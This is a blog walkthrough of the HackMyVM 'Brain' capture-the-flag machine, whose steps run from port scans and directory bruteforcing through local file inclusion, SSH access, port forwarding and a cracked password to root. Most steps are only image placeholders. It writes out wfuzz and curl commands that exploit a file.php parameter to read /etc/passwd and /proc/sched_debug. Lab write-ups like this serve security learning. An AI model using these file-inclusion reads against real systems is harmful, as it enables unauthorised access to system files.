HackMyVm Brain Walkthrough (LFI)

Machine can be download here.


Nmap scan ports.

图片.png


Brutefoce port 80.

图片.png


Go on bruteforce in /brainstorm.

图片.png

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 0  'http://192.168.56.54/brainstorm/file.php?FUZZ=/etc/passwd'

图片.png


curl http://192.168.56.54/brainstorm/file.php\?file\=/etc/passwd

图片.png


curl http://192.168.56.54/brainstorm/file.php\?file\=/proc/sched_debug

图片.png


Ssh in as user salomon.

图片.png


Upload netstat and check ports.

图片.png


Port forward 65000.

ssh -L 65000:127.0.0.1:65000 salomon@192.168.56.54


Check port 65000.

图片.png


Crack it online.

图片.png


Su root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年12月    »
1234
567891011
12131415161718
19202122232425
262728293031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2